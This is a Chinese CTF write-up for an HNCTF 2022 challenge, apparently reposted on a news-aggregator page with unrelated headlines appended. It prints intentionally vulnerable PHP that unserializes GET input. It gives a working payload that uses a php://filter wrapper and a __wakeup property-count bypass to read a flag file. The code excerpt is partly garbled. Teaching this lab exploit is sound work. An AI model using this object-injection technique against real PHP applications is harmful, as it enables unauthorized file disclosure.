(资料图)
want = $want; else $this->want = $this->todonothing; } function __wakeup(){ $About_me = "When the object is unserialized,I will be called"; $but = "I can CHANGE you"; $this-> want = $but; echo "C1ybaby!"; } function __destruct(){ $About_me = "I"m the final function,when the object is destroyed,I will be called"; echo "So,let me see if you can get what you want\n"; if($this->todonothing === $this->want) die("鲍勃,别傻愣着!\n"); if($this->want == "I can CHANGE you") die("You are not you...."); if($this->want == "f14g.php" OR is_file($this->want)){ die("You want my heart?No way!\n"); }else{ echo "You got it!"; highlight_file($this->want); } }} class unserializeorder{ public $CORE = "人类最大的敌人,就是无序. Yahi param vaastavikta hai!
"; function __sleep(){ $About_me = "When the object is serialized,I will be called"; echo "We Come To HNCTF,Enjoy the ser14l1zti0n
"; } function __toString(){ $About_me = "When the object is used as a string,I will be called"; return $this->CORE; } } $obj = new unserializeorder(); echo $obj; $obj = serialize($obj); if (isset($_GET["ywant"])) { $ywant = @unserialize(@$_GET["ywant"]); echo $ywant; }?>人类最大的敌人,就是无序. Yahi param vaastavikta hai!We Come To HNCTF,Enjoy the ser14l1zti0n 首先看代码可知,flag在f14g.php中,所以我们只要找到能够利用的点就可以了。
往上看可以看到body类中highlight_file()可以进行利用,所以说我们需要让want为我们想要的f14g.php就可以了。
function __destruct(){ $About_me = "I"m the final function,when the object is destroyed,I will be called"; echo "So,let me see if you can get what you want\n"; if($this->todonothing === $this->want) die("鲍勃,别傻愣着!\n"); if($this->want == "I can CHANGE you") die("You are not you...."); if($this->want == "f14g.php" OR is_file($this->want)){ die("You want my heart?No way!\n"); }else{ echo "You got it!"; highlight_file($this->want); } } 但是这边过滤的有点严,若是want=f14g.php,或者说是is_file()中的文件存在的话就会返回"So,let me see if you can get what you want\n";
所以我们不能直接让want=f14g.php,这里可以用php://filter伪协议来回显f14g.php文件。
构造如下:
"; }$a=new body();echo urlencode(serialize($a));?>
payload:?ywant=O%3A4%3A"body"%3A2%3A{s%3A10%3A"%00body%00want"%3Bs%3A30%3A"php%3A%2F%2Ffilter%2Fresource%3Df14g.php"%3B}
这里注意还需要绕过__wakeup魔术方法,所以%3A %3A中间原本为1,现在为2。
关键词:
世界观焦点:[HNCTF 2022 WEEK2]
2023-05-05阿里健康料扭亏为盈 录得利润净额不少于4.5亿元_世界动态
2023-05-05每日快讯!2小时可直达香港!广州琶洲港澳客运口岸开通了
2023-05-05罗湖口岸几点开始过关_罗湖口岸过关后怎么去香港
2023-05-05世界实时:宗校立:非农再度降临,今晚会带来怎样意外?
2023-05-05要闻速递:光迅科技:公司没有参与“悟空”量子计算机的相关研发
2023-05-05高鸿股份(000851.SZ):高新创投拟减持不超405.28万股 世界热资讯
2023-05-05男子6点入住酒店被要求当天中午12点退房,再住要交1天房费,酒店回应:8点后入住才能在第二天中午12点退房 全球热推荐
2023-05-05世界百事通!养老基金有哪些种类_养老基金有哪些
2023-05-05奥普光电:公司参与了该项目的申报,仅做了原理性研究,不是由中科院发起的-全球观热点
2023-05-05世界观焦点:[HNCTF 2022 WEEK2]
2023-05-05阿里健康料扭亏为盈 录得利润净额不少于4.5亿元_世界动态
2023-05-05每日快讯!2小时可直达香港!广州琶洲港澳客运口岸开通了
2023-05-05罗湖口岸几点开始过关_罗湖口岸过关后怎么去香港
2023-05-05世界实时:宗校立:非农再度降临,今晚会带来怎样意外?
2023-05-05要闻速递:光迅科技:公司没有参与“悟空”量子计算机的相关研发
2023-05-05高鸿股份(000851.SZ):高新创投拟减持不超405.28万股 世界热资讯
2023-05-05男子6点入住酒店被要求当天中午12点退房,再住要交1天房费,酒店回应:8点后入住才能在第二天中午12点退房 全球热推荐
2023-05-05世界百事通!养老基金有哪些种类_养老基金有哪些
2023-05-05奥普光电:公司参与了该项目的申报,仅做了原理性研究,不是由中科院发起的-全球观热点
2023-05-05Copyright 2015-2022 华北超市网版权所有 备案号:粤ICP备18023326号-8 联系邮箱:855 729 8@qq.com
